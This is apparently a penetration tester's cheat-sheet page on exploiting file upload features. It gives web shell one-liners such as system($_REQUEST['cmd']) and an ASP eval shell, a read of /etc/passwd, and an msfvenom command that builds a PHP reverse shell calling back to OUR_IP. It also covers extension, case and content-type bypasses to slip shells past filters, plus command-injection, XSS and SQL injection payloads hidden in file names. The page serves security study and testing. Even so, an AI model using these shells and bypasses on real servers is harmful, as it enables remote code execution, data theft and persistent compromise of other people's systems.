search

File Uploads

Hacktricksarrow-up-right

PayloadAllTheThingsarrow-up-right

hashtag
WebShells

One good option for PHP is phpbasharrow-up-right, which provides a terminal-like, semi-interactive web shell.

SecListsarrow-up-right provides a plethora of web shells for different frameworks and languages.

hashtag
Cheatsheet

Web Shell 	Description
<?php file_get_contents('/etc/passwd'); ?> 	Basic PHP File Read
<?php system('hostname'); ?> 	Basic PHP Command Execution
<?php system($_REQUEST['cmd']); ?> 	Basic PHP Web Shell
<% eval request('cmd') %> 	Basic ASP Web Shell
msfvenom -p php/reverse_php LHOST=OUR_IP LPORT=OUR_PORT -f raw > reverse.php 	Generate PHP reverse shell

PHP Web Shellarrow-up-right

PHP Web Shell

PHP Reverse Shellarrow-up-right

PHP Reverse Shell

Web/Reverse Shellsarrow-up-right

List of Web Shells and Reverse Shells

hashtag
ByPasses

Command

Description

Client-Side Bypass

[CTRL+SHIFT+C]

Toggle Page Insepctor

Blacklist Bypass

shell.phtml

Uncommon Extension

shell.pHp

Case Manipulation

PHP Extensionsarrow-up-right

List of PHP Extensions

ASP Extensionsarrow-up-right

List of ASP Extensions

Web Extensionsarrow-up-right

List of Web Extensions

Whitelist Bypass

shell.jpg.php

Double Extension

shell.php.jpg

Reverse Double Extension

%20, %0a, %00, %0d0a, /, .\, .,

Character Injection - Before/After Extension

Content/Type Bypass

Web Content-Typesarrow-up-right

List of Web Content-Types

Content-Typesarrow-up-right

List of All Content-Types

File Signaturesarrow-up-right

List of File Signatures/Magic Bytes

hashtag
XSS

Many file types may allow us to introduce a Stored XSS vulnerability to the web application by uploading maliciously crafted versions of them.

The most basic example is when a web application allows us to upload HTML files. Although HTML files won't allow us to execute code (e.g., PHP), it would still be possible to implement JavaScript code within them to carry an XSS or CSRF attack on whoever visits the uploaded HTML page.

we can include an XSS payload in one of the Metadata parameters that accept raw text, like the Comment or Artist parameters, as follows:

XSS attacks can also be carried with SVG images, along with several other attacks. Scalable Vector Graphics (SVG) images are XML-based, and they describe 2D vector graphics, which the browser renders into an image. For this reason, we can modify their XML data to include an XSS payload. For example:

hashtag
XXE

With SVG images, we can also include malicious XML data to leak the source code of the web application, and other internal documents within the server

we can also use XXE to read source code in PHP web applications:

hashtag
Injections in File Name

For example, if we name a file file$(whoami).jpg or file`whoami`.jpg or file.jpg||whoami, and then the web application attempts to move the uploaded file with an OS command (e.g. mv file /tmp), then our file name would inject the whoami command, which would get executed giving us RCE.

Similarly, we may use an XSS payload in the file name (e.g. <script>alert(window.origin);</script>), which would get executed on the target's machine if the file name is disabled to them. We may also inject an SQL query in the file name (e.g. file';select+sleep(5);--.jpg), which may lead to an SQL injection if the file name is insecurely used in an SQL query.

PreviousCommand injectionsNextAbusing Intermediary Applications

Last updated